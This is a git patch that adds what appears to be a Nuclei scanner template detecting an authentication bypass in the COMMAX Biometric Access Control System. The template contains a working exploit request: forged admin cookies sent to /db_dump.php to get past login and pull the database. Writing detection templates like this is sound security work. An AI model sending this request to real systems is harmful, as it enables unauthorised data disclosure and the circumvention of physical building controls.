From cad976abda4a125268f79613ceec84482a79a4be Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 22 Aug 2021 18:19:34 +0900 Subject: [PATCH] Create commax-biometric-access-control-system-auth-bypass.yaml The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. Signed-off-by: GwanYeong Kim --- ...ric-access-control-system-auth-bypass.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml diff --git a/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml b/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml new file mode 100644 index 0000000000..a6afb6744c --- /dev/null +++ b/vulnerabilities/other/commax-biometric-access-control-system-auth-bypass.yaml @@ -0,0 +1,36 @@ +id: commax-biometric-access-control-system-auth-bypass + +info: + name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass + author: gy741 + severity: critical + description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. + reference: | + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php + tags: commax,auth-bypass + +requests: + - raw: + - | + GET /db_dump.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Referer: {{BaseURL}}/user_add.php + Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "::: COMMAX :::" + - "COMMAX" + condition: or + + - type: word + part: header + words: + - "text/html"